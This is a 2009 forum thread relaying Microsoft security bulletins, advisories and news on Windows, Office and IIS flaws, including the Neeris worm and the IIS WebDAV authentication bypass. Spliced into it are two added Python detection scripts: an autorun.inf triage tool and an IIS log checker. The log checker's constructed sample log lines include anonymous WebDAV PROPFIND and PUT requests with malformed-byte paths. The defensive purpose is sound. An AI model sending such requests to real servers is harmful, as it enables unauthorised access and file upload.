Last Updated: 2009-03-13 03:07:43 UTC - "...Microsoft should really fix this vulnerability and pay more attention to local privilege escalation vulnerabilities. While MS released an advisory with suggested workarounds (available at http://www.microsoft.com/technet/security/advisory/951306.mspx *), I don’t think enough people know about this..."
* Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege...
Revisions:
• April 17, 2008: Advisory published
• April 23, 2008: Added clarification to impact of workaround for IIS 6.0
• August 27, 2008: Added Windows XP Professional Service Pack 3 as affected software.
• October 9, 2008: Added information regarding the public availability of exploit code.

:fear::fear:

AplusWebMaster
2009-04-03, 13:20
FYI...

Microsoft Security Advisory (969136)
Vulnerability in Microsoft Office PowerPoint Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/969136.mspx
April 2, 2009 - "Microsoft is investigating new reports of a vulnerability in Microsoft Office PowerPoint that could allow remote code execution if a user opens a specially crafted PowerPoint file. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability... Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs..."

- http://secunia.com/advisories/34572/
Release Date: 2009-04-03
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched ...

- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0556

:fear:

AplusWebMaster
2009-04-06, 13:20
FYI...

New exploit of MS08-067
- http://blogs.technet.com/mmpc/archive/2009/04/03/a-new-exploit-of-ms08-067-has-been-identified.aspx
April 03, 2009 - "... We have found a new exploit of MS08-067 other than Conficker. We also discovered that we already detected and protected users against this new malware... Neeris is a worm that has been active for a few years. Some of its variants used to exploit MS06-040 which addressed a vulnerability in the same Server service as MS08-067. However it looks like the authors of Neeris have been taking notes from Conficker. A new variant of the Neeris worm has been launched this week. It has some interesting similarities to Conficker:
• The new variant of Neeris has been updated to exploit MS08-067. Also, after the successful exploitation, the victim machine downloads a copy of the worm from the attacking machine using HTTP.
• Neeris spreads via autorun. The new Neeris variant even adds the same ‘Open folder to view files’ AutoPlay option that Conficker does.
• Neeris uses a driver to patch the TCP/IP layer of the system in order to remove the outgoing connection limits from XPSP2 ...
The file names that this malware uses are deceptive. Most commonly we saw it using the name “Netmon.exe” but it sometimes masquerades as an SCR file with names that follow the pattern <two digits.scr>. It also drops a copy of itself using the file name smartkey.exe. Even its image time stamp is bogus: 6/19/1992 10:22:17 PM. The malware adds itself to start every time Windows starts and even adds itself to the Safe Boot configuration.
Due to the similarities to Conficker, most of the mitigations that were mentioned also apply here: make sure to install MS08-067 if you haven’t done so yet and be careful to use only AutoPlay options you’re familiar with or consider disabling the Autorun altogether. Other mitigations and information are available in our write up at Worm:Win32/Neeris.gen!C *..."
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fNeeris.gen!C

:fear::fear:
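The MMPC post above names two removable-media tells for this Neeris variant: an AutoPlay entry carrying the same "Open folder to view files" label that Explorer uses for its own action, and launch targets named Netmon.exe, smartkey.exe or <two digits>.scr. The following is an added example, not code from the post or from Microsoft, of a small autorun.inf triage script that parses the file and reports those indicators. The autorun.inf samples are constructed for the example, and the indicator list is a hypothetical starting point assembled from the post, not a published signature.

```python
import re
from typing import Dict, List

# Label Windows Explorer shows for its own "open the folder" AutoPlay choice; the MMPC post
# says Conficker and the new Neeris variant add an AutoPlay entry carrying this same text.
EXPLORER_OPEN_FOLDER_LABEL = "open folder to view files"

# File names the post reports Neeris using (Netmon.exe, smartkey.exe), lowercased for comparison.
KNOWN_NAMES = {"netmon.exe", "smartkey.exe"}

EXECUTABLE_EXTS = (".exe", ".scr", ".com", ".bat", ".cmd", ".pif")


def parse_autorun_inf(text: str) -> Dict[str, Dict[str, str]]:
    """Small INI parser for autorun.inf: {section: {key: value}}, section and key names lowercased.
    Lines that are not 'key=value' inside a section are skipped rather than rejected, because
    worm-written autorun.inf files are often padded with junk to confuse simple scanners."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_targets(autorun: Dict[str, str]) -> List[str]:
    """Every file an [autorun] section would launch: open=, shellexecute= and shell\\<verb>\\command= keys."""
    targets: List[str] = []
    for key, value in autorun.items():
        is_launch_key = key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command"))
        if is_launch_key and value:
            target = value.split()[0].strip('"').lower()
            if target not in targets:
                targets.append(target)
    return targets


def assess_autorun(text: str) -> List[str]:
    """Return the indicators found in an autorun.inf that make it worth a closer look (empty list = none)."""
    autorun = parse_autorun_inf(text).get("autorun", {})
    reasons: List[str] = []
    targets = launch_targets(autorun)
    for target in targets:
        name = target.replace("/", "\\").rsplit("\\", 1)[-1]  # file name without its directory
        if name in KNOWN_NAMES:
            reasons.append(f"launches a file name reported for Neeris: {name}")
        elif re.fullmatch(r"\d{2}\.scr", name):
            reasons.append(f"launches a two-digit .scr file as described in the write-up: {name}")
        elif name.endswith(EXECUTABLE_EXTS):
            reasons.append(f"launches an executable from the media: {name}")
    action = autorun.get("action", "").strip('"').lower()
    if targets and action == EXPLORER_OPEN_FOLDER_LABEL:
        reasons.append("AutoPlay label copies Explorer's own 'Open folder to view files' entry while launching a file")
    return reasons


# Constructed samples for the example, not files recovered from an infection.
BENIGN_USB = r"""[autorun]
label=Backup Stick
icon=drive.ico
"""

LURE_SAMPLE = r"""[autorun]
; comment lines like this one are common padding
action=Open folder to view files
open=RECYCLER\netmon.exe
shell\open\command=RECYCLER\netmon.exe
useautoplay=1
"""

SCR_SAMPLE = r"""[autorun]
open=17.scr
action=Open folder to view files
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_USB), ("lure", LURE_SAMPLE), ("scr", SCR_SAMPLE)):
        print(label, assess_autorun(sample) or ["no indicators"])
```

Any autorun.inf that launches a program from removable media is the risk the post's mitigation (disable Autorun, or use only AutoPlay options you recognise) addresses; the label check only tells you when the entry is dressed up to look like Explorer's own.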

AplusWebMaster
2009-04-11, 00:39
FYI...

- http://www.wservernews.com/
Apr. 10, 2009 - "Next Tuesday (14-Apr-2009), Redmond will no longer offer mainstream support for a bunch of Service Pack flavors, WinXP (Service Pack 0) and W2K3 SP1 among them. They said they will continue to provide free security fixes for XP until 2014. Windows XP still accounts for about 63 percent of all Internet-connected computers, according to March 2009 statistics from Hitslink, while Windows Vista makes up about 24 percent. Here are the Hitslink market share numbers:
http://marketshare.hitslink.com/operating-system-market-share.aspx?qprid=10
Support for WinXP Service Pack 2 is until July 13, 2010. Existing XP users are encouraged to upgrade to the latest SP3. More about this at the "Windows Service Pack Road Map" at Microsoft:
- http://www.microsoft.com/windows/lifecycle/servicepacks.mspx ...
... list of products and versions where the support will end on April 14, 2009...
- http://preview.tinyurl.com/s870 ..."

:lip:

AplusWebMaster
2009-04-13, 13:27
FYI...

- http://preview.tinyurl.com/cj5b73
April 10, 2009 IEBlog - "... Starting on or about the third week of April, users still running IE6 or IE7 on Windows XP, Windows Vista, Windows Server 2003, or Windows Server 2008 will get a notification through Automatic Update about IE8. This rollout will start with a narrow audience and expand over time to the entire user base. On Windows XP and Server 2003, the update will be High-Priority. On Windows Vista and Server 2008 it will be Important. IE8 will not automatically install on machines. Users must opt-in to install IE8. Users will see a Welcome screen that offers choices: Ask later, install now, or don’t install. Users who decline the automatic update can still download it from http://www.microsoft.com/ie8 or from Windows Update as an optional update... If an organization uses Automatic Update to keep Windows up-to-date but wants to manage its own deployment of IE8, a free Blocker Toolkit* is available that will block automatic delivery of IE8. This blocker toolkit was released in January 2009 and has no expiration date..."
* http://preview.tinyurl.com/9yjpqw

:spider::buried:

AplusWebMaster
2009-04-14, 20:27
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-apr.mspx?pf=true
April 14, 2009 - "This bulletin summary lists security bulletins released for April 2009... (Total of -8- )

Critical (5)

Microsoft Security Bulletin MS09-009
Vulnerabilities in Microsoft Office Excel Could Cause Remote Code Execution (968557)
- http://www.microsoft.com/technet/security/bulletin/MS09-009.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-010
Vulnerabilities in WordPad and Office Text Converters Could Allow Remote Code Execution (960477)
- http://www.microsoft.com/technet/security/bulletin/MS09-010.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Microsoft Office...

Microsoft Security Bulletin MS09-011
Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution (961373)
- http://www.microsoft.com/technet/security/bulletin/MS09-011.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-013
Vulnerabilities in Windows HTTP Services Could Allow Remote Code Execution (960803)
- http://www.microsoft.com/technet/security/bulletin/MS09-013.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-014
Cumulative Security Update for Internet Explorer (963027)
- http://www.microsoft.com/technet/security/bulletin/MS09-014.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Important (2)

Microsoft Security Bulletin MS09-012
Vulnerabilities in Windows Could Allow Elevation of Privilege (959454)
- http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-016
Vulnerabilities in Microsoft ISA Server and Forefront Threat Management Gateway (Medium Business Edition) Could Cause Denial of Service (961759)
- http://www.microsoft.com/technet/security/bulletin/MS09-016.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Forefront Edge Security...

Moderate (1)

Microsoft Security Bulletin MS09-015
Blended Threat Vulnerability in SearchPath Could Allow Elevation of Privilege (959426)
- http://www.microsoft.com/technet/security/bulletin/MS09-015.mspx
Maximum Severity Rating: Moderate
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

- http://blogs.technet.com/msrc/archive/2009/04/14/april-2009-monthly-bulletin-release.aspx
April 14, 2009
___

MSRT - April 2009
- http://support.microsoft.com/?kbid=890830
April 14, 2009 - Revision: 58.0
(Recent adds)
Win32/Conficker - January 2009 (V 2.6) High
Win32/Srizbi - February 2009 (V 2.7) Moderate
Win32/Koobface - March 2009 (V 2.8) Moderate
Win32/Waledac - April 2009 (V 2.9) Moderate
Download: http://preview.tinyurl.com/6bb67
___

ISC Analysis (includes CVE links)
- http://isc.sans.org/diary.html?storyid=6193
Last Updated: 2009-04-15 02:14:16 UTC ...
___

- http://preview.tinyurl.com/cnylhb
April 14, 2009 (Computerworld) - 10 of the 23 vulnerabilities have already been exploited or are public...

.

AplusWebMaster
2009-04-15, 13:43
FYI...

Microsoft Security Advisory (968272)
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/968272.mspx
Published: February 24, 2009 | Updated: April 14, 2009 - "... We have issued MS09-009 to address this issue..."
- http://www.microsoft.com/technet/security/bulletin/MS09-009.mspx

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 | Updated: April 14, 2009 - "... We have issued MS09-010 to address this issue..."
- http://www.microsoft.com/technet/security/bulletin/MS09-010.mspx

Microsoft Security Advisory (953818)
Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform
- http://www.microsoft.com/technet/security/advisory/953818.mspx
Published: May 30, 2008 | Updated: April 14, 2009 - "... Customers running Safari on Windows should review this advisory. We have issued Microsoft Security Bulletin MS09-014, Cumulative Security Update for Internet Explorer (963027), and MS09-015, Blended Threat Vulnerability in SearchPath Could Allow Elevation of Privilege (959426), to address this issue. For more information about this issue, including download links for security updates, please review MS09-014 and MS09-015.
- http://www.microsoft.com/technet/security/Bulletin/ms09-014.mspx
- http://www.microsoft.com/technet/security/Bulletin/ms09-015.mspx
Apple Support has released a security advisory that addresses the vulnerability in Apple’s Safari 3.1.2 for Windows. Please see Apple security advisory About the security content of Safari 3.1.2 for Windows for more information.
- http://support.apple.com/kb/HT2092
Mitigating Factors:
• Customers who have changed the default location where Safari downloads content to the local drive are not affected by this blended threat..."

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
Published: April 17, 2008 | Updated: April 14, 2009 - "... We have issued MS09-012 to address this issue..."
- http://www.microsoft.com/technet/security/Bulletin/ms09-012.mspx

:fear:

AplusWebMaster
2009-04-29, 15:05
FYI...

IEv8 now pushed...
- http://isc.sans.org/diary.html?storyid=6283
Last Updated: 2009-04-28 23:55:01 UTC - "If you were to go to your "Windows Update..." feature today, you will see that IE8 is now available as a "critical" update to your Microsoft OS..."

Internet Explorer 8 for Windows XP
Date last published: 4/28/2009
Download size: 16.1 MB

:lip:

AplusWebMaster
2009-04-29, 22:34
FYI...

MS Office 2007 SP2 released
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=217200466
April 28, 2009 - "The productivity suite update adds built-in support for Open Document Format and a slew of other tweaks, including improved Outlook performance... The new service pack became available as a manual download* Tuesday. It won't become an automatic update for another 90 days, and then only with a 30-day notice."
* http://preview.tinyurl.com/cfq34v
Knowledge Base (KB) Articles: http://support.microsoft.com/kb/953195
Date Published: 4/24/2009
290.2 MB

>> Note: Several reports found both the IEv8 and MS Office 2007 SP2 updates available on the MS Update site.

- http://jkontherun.com/2009/04/30/office-2007-sp2-breaking-corporate-email/
April 30, 2009 - "... a number of corporate users are experiencing a major bug in SP2 that affects the ability to access the Global Address Book, effectively rendering corporate email useless. One corporate user says the problem went away when Office 2007 SP2 was removed..."

:lip:

AplusWebMaster
2009-04-30, 17:43
FYI...

MS Security Bulletin revisions to:

• MS09-012 - Important
- http://www.microsoft.com/technet/security/bulletin/ms09-012.mspx
• -V2.0- (April 29, 2009): Added an entry to the section, Frequently Asked Questions (FAQ) Related to This Security Update to communicate the rerelease of the Norwegian-language update for Microsoft Windows 2000 Service Pack 4 (KB952004). Customers who require the Norwegian-language update need to download and install the rereleased update. No other updates or locales are affected by this rerelease.

• MS08-076 - Important
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
• -V4.0- (April 29, 2009): Added Windows Media Services 2008 (KB952068) on 32-bit and x64-based editions of Windows Server 2008 Service Pack 2 as affected software. Also, added Windows Server 2008 for Itanium-based Systems Service Pack 2 as non-affected software. This is a detection change only; there were no changes to the binaries. Customers who have already successfully installed KB952068 do not need to reinstall.

• MS08-069 - Critical
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
• -V2.0- (April 29, 2009): Added Microsoft XML Core Services 4.0 (KB954430) on 32-bit and x64-based editions of Windows Vista Service Pack 2 and on 32-bit, x64-based, and Itanium-based editions of Windows Server 2008 Service Pack 2 as affected software. Also added as non-affected software: Microsoft XML Core Services 3.0 and Microsoft XML Core Services 6.0 on 32-bit and x64-based editions of Windows Vista Service Pack 2 and on 32-bit, x64-based, and Itanium-based editions of Windows Server 2008 Service Pack 2. This is a detection change only; there were no changes to the binaries. Customers who have already successfully installed KB954430 do not need to reinstall.

:fear:

AplusWebMaster
2009-05-12, 20:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-may.mspx
May 12, 2009 - "This bulletin summary lists security bulletins released for May 2009...
(Total of -1-)

Critical

Microsoft Security Bulletin MS09-017 - Critical
Vulnerabilities in Microsoft Office PowerPoint Could Allow Remote Code Execution (967340)
- http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

- http://secunia.com/advisories/32428/2/
Last Update: 2009-05-13
Critical: Highly critical

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0220
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0221
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0222
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0223
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0224
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0225
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0226
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0227
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0556
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1128
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1129
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1130
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1131
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1137
___

MSRT - May 2009
- http://support.microsoft.com/?kbid=890830
May 12, 2009 - Revision: 59.0
(Recent adds)...
Win32/Koobface March 2009 (V 2.8) Moderate
Win32/Waledac April 2009 (V 2.9) Moderate
Win32/Winwebsec May 2009 (V 2.10) Moderate ...
Download: http://preview.tinyurl.com/6bb67
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6376
Last Updated: 2009-05-12 17:47:16 UTC

AplusWebMaster
2009-05-13, 18:50
FYI...

Microsoft Security Advisory (969136)
Vulnerability in Microsoft Office PowerPoint Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/969136.mspx
Updated: May 12, 2009 - "...We have issued MS09-017* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0556

// At least one of the vulnerabilities is actively being exploited in the wild.

AplusWebMaster
2009-05-15, 18:43
FYI...

- http://pandalabs.pandasecurity.com/archive/MS08_2D00_066-in-the-wild.aspx
14 May 09 - "... use Windows with a regular user account, in order to avoid most of the malware actions that require admin rights (install rootkits, modify system files, registry or services, …). However, it’s really important to keep our system updated. You should install Windows updates every month because even if your default Windows user hasn’t got admin privileges, you could still have problems if you execute malware... With this piece of code, if the system hasn’t been updated with the MS08-066* patch, the malware would be able to do whatever it wants..."
* http://www.microsoft.com/technet/security/bulletin/ms08-066.mspx
Vuln in the MS Ancillary Function Driver Could Allow Elevation of Privilege (956803)
... Why was this security bulletin revised on January 13, 2009?
Microsoft revised this security bulletin to announce a detection change for this security update. As a result of the correction, the detection offers the security update to affected systems that previously were not offered this security update....
- http://support.microsoft.com/kb/956803

(More detail available at the PandaLabs URL above.)

:fear::fear:

AplusWebMaster
2009-05-16, 16:46
FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
May 16, 2009 - "The ThreatCon is currently at Level 2: Elevated... A newly discovered and unpatched flaw has been disclosed affecting Microsoft IIS 6 with WebDAV enabled. Due to an error in the way Unicode characters are handled, it is possible for an attacker to bypass authentication requirements when accessing a protected resource. It may also be possible for attackers to upload files to a vulnerable server without supplying credentials. Due to the nature of this flaw and the ease with which it can be triggered, we feel that it is probable that attacks will be carried out in the wild. Reports indicate that Microsoft IIS 7 is not vulnerable. More information is available in the following BID: Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities
http://www.securityfocus.com/bid/34993 ..."

- http://isc.sans.org/diary.html?storyid=6397
Last Updated: 2009-05-16 00:05:27 UTC - "... adding certain Unicode characters to a URL makes it possible to bypass authentication in Microsoft IIS6 with WebDAV and access or even upload files in folders which are supposed to be password protected... If you have WebDAV active and accessible from the Internet on any of your IIS6, it is probably a wise move to hedge and turn WebDAV off..."
- http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html

- http://secunia.com/advisories/35109/2/
Release Date: 2009-05-18
Critical: Moderately critical
Impact: Security Bypass
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Information Services (IIS) 5.x, Microsoft Internet Information Services (IIS) 6
Solution: Do not store sensitive files inside the webroot. Disable WebDAV support...

:fear::fear:

AplusWebMaster
2009-05-19, 12:48
FYI...

Microsoft Security Advisory (971492)
Vulnerability in Internet Information Services Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/971492.mspx
May 18, 2009 - "Microsoft is investigating new public reports of a possible vulnerability in Microsoft Internet Information Services (IIS). An elevation of privilege vulnerability exists in the way that the WebDAV extension for IIS handles HTTP requests. An attacker could exploit this vulnerability by creating a specially crafted anonymous HTTP request to gain access to a location that typically requires authentication. We are not aware of attacks that are trying to use this vulnerability or of customer impact at this time. Microsoft is investigating the public reports...
Workarounds:
- Disable WebDAV...
- Alternate method to disable WebDAV on IIS 5.0 and IIS 5.1...
- Alternate method to disable WebDAV on IIS 5.1 and IIS 6.0...
- Change file system ACLs to deny access to the anonymous user account...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1676
Last revised: 05/20/2009
CVSS v2 Base Score: 7.6 (HIGH)

> http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx
May 18, 2009

Understanding Microsoft's KB971492 IIS5/IIS6 WebDAV Vulnerability
- http://unixwiz.net/techtips/ms971492-webdav-vuln.html
26 May 2009

:fear:
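Both IIS WebDAV posts above (the Symantec/ISC summary and Microsoft Security Advisory 971492) describe the same thing from the defender's side: anonymous WebDAV requests whose path carries percent-encoded bytes that are not well-formed Unicode, reaching locations that should have required authentication. The following is an added example, not code from Microsoft, ISC or Symantec, of a checker that runs over IIS W3C extended log lines and flags two things: a request path whose percent-encoded bytes do not decode as valid UTF-8 (overlong and otherwise invalid sequences fall in this class), and a WebDAV method from an anonymous user (cs-username "-") that got a 2xx/207 answer for a path under a prefix the site protects. The log lines, the protected prefixes and the client addresses are all constructed for the example; it also assumes the log records the path as received, still percent-encoded.

```python
from typing import Dict, List
from urllib.parse import unquote_to_bytes

# Methods the WebDAV extension handles (plus PUT/DELETE, which the bypass reports mention for uploads).
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "PUT", "DELETE"}

# Constructed: paths this hypothetical site protects with authentication.
PROTECTED_PREFIXES = ("/protected/", "/admin/")

# Constructed sample in IIS W3C extended log format; not real server output.
# %fe and %ff can never appear in well-formed UTF-8, so they stand in for the malformed class.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-05-16 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-05-16 00:01:02 10.0.0.5 GET /index.htm - 80 - 192.0.2.10 Mozilla/4.0 200 0 0
2009-05-16 00:01:09 10.0.0.5 GET /protected/report.doc - 80 - 192.0.2.10 Mozilla/4.0 401 2 5
2009-05-16 00:01:15 10.0.0.5 PROPFIND /protected/ - 80 jdoe 192.0.2.11 Microsoft-WebDAV-MiniRedir/5.1.2600 207 0 0
2009-05-16 00:01:21 10.0.0.5 PROPFIND /%fe%ffprotected/ - 80 - 192.0.2.12 Mozilla/4.0 207 0 0
2009-05-16 00:01:30 10.0.0.5 PUT /protected/%fe%ffupload.aspx - 80 - 192.0.2.12 Mozilla/4.0 201 0 0
2009-05-16 00:01:44 10.0.0.5 GET /caf%c3%a9.htm - 80 - 192.0.2.13 Mozilla/4.0 200 0 0
"""


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text into one dict per request, keyed by the names in the #Fields line."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives: #Software, #Version, #Date
        values = line.split()  # W3C format encodes spaces inside fields as '+', so a plain split is safe
        if len(values) != len(fields):
            continue  # malformed or truncated line: skip rather than guess at the columns
        records.append(dict(zip(fields, values)))
    return records


def path_is_wellformed_utf8(stem: str) -> bool:
    """True if the percent-decoded bytes of the path form valid UTF-8."""
    try:
        unquote_to_bytes(stem).decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def analyze_log(text: str) -> List[Dict[str, str]]:
    """Return one alert dict per (request, reason) for requests that match either rule."""
    alerts: List[Dict[str, str]] = []
    for rec in parse_w3c(text):
        method = rec.get("cs-method", "")
        stem = rec.get("cs-uri-stem", "")
        user = rec.get("cs-username", "-")
        status = int(rec.get("sc-status", "0"))
        # Decode for the prefix check with replacement characters, so a bad byte cannot crash the loop.
        decoded = unquote_to_bytes(stem).decode("utf-8", errors="replace")
        reasons: List[str] = []
        if not path_is_wellformed_utf8(stem):
            reasons.append("malformed-utf8-path")
        if (method in WEBDAV_METHODS and user == "-" and 200 <= status < 300
                and decoded.startswith(PROTECTED_PREFIXES)):
            reasons.append("anonymous-webdav-success-on-protected-path")
        for reason in reasons:
            alerts.append({"client": rec.get("c-ip", "?"), "method": method,
                           "path": stem, "status": str(status), "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG):
        print(alert)
```

The malformed-path rule is the one worth keeping after the bypass is patched: a request whose path does not decode as UTF-8 is never something a browser or the Windows WebDAV redirector sends on its own. The second rule only works if the protected prefixes match how the site actually assigns ACLs, and it is a detection aid, not a substitute for the workarounds the advisory lists (disable WebDAV, or deny the anonymous account on the file system).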

AplusWebMaster
2009-05-21, 00:22
FYI...

- http://www.theregister.co.uk/2009/05/20/iis_bug_fells_university_server/
20 May 2009 - "Hackers have wasted no time targeting a gaping hole in Microsoft's Internet Information Services webserver, according to administrators at Ball State University, who say servers that used the program were breached on Monday... On Monday, Microsoft confirmed what it called an "elevation of privilege vulnerability" in versions 5 and 6 of IIS when it runs an extension known as WebDAV. Microsoft said at the time it was unaware of any in-the-wild exploits of the vulnerability. The assessment was at odds with this warning*..."
* http://www.us-cert.gov/current/index.html#microsoft_internet_information_services_iis
updated May 19, 2009 - "... US-CERT is also aware of publicly available exploit code and active exploitation of this vulnerability... note that disabling WebDAV may affect the functionality of other applications such as SharePoint..."

- http://www.theregister.co.uk/2009/05/21/ball_state_retracts/
21 May 2009 - "Network administrators at Ball State University have retracted their claims that a campus website was brought down by a zero-day vulnerability in Microsoft's Internet Information Services webserver... corrects an advisory campus officials issued Tuesday that claimed the breach was the result of someone targeting a vulnerability in versions 5 and 6 of IIS that allows attackers to list, access, and in some cases upload files in password-protected folders of vulnerable machines. The vulnerability exists when IIS uses the WebDAV protocol. The advisory was featured prominently on the university's website. "Initially, both Microsoft and Ball State suspected the intruder used the WebDAV vulnerability that was made public by Microsoft on May 15," Proudfoot said..."

Corrected CVE:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1676
Last revised: 05/20/2009
CVSS v2 Base Score: 7.6 (HIGH)

// http://forums.spybot.info/showpost.php?p=312447&postcount=98

AplusWebMaster
2009-05-27, 15:40
FYI...

- http://www.theinquirer.net/inquirer/news/1137482/vista-service-pack-light
26 May 2009 - "... Microsoft has finally released the next official first aid kit for Windows Vista - SP2. If you've been running the BETA of Service Pack 2 that was released last year, then you'll need to uninstall that before installing the official service pack. Plus, you'll also need to have Service Pack 1 installed first. Although the Service Pack hasn't made it to Windows Update yet, you can now grab the official downloads from Microsoft's Download Center. The installer includes Service Pack 2 for both Windows Vista and Windows Server 2008, resulting in a 348.3MB file for the 32-bit version - and a 577.4MB file for the 64-bit version. Despite the massive file size, however, there's not much to get excited about. The update mainly includes all of the bits and bobs that have been released since Service Pack 1, although this doesn't include Internet Explorer 8..."

- http://technet.microsoft.com/en-us/windows/dd262148.aspx
May 26, 2009

:spider:

AplusWebMaster
2009-05-29, 02:02
FYI...

Microsoft Security Advisory (971778)
Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/971778.mspx
May 28, 2009 - "Microsoft is investigating new public reports of a new vulnerability in Microsoft DirectX. The vulnerability could allow remote code execution if a user opened a specially crafted QuickTime media file. Microsoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers..."

- http://www.theregister.co.uk/2009/05/28/critical_microsoft_directx_vulnerability/
28 May 2009 22:37 GMT - "... Microsoft has offered several work-arounds until a patch is available. The most straight-forward of them involves visiting this link* and clicking on the "Fix it" icon. (We got an error when using Firefox, but it worked fine with Internet Explorer)..."
* http://support.microsoft.com/kb/971778

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1537

- http://secunia.com/advisories/35268/2/
Release Date: 2009-05-29
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched...
Solution: Disable the parsing of QuickTime content in quartz.dll. Please see the vendor's advisory for more information. Do not browse untrusted websites or follow untrusted links. Do not open untrusted media files...

:fear:

AplusWebMaster
2009-06-04, 13:52
FYI...

Problems confirmed with Vista SP2
- http://windowssecrets.com/comp/090604#known0
2009-06-04

:sad:

AplusWebMaster
2009-06-09, 20:55
FYI...

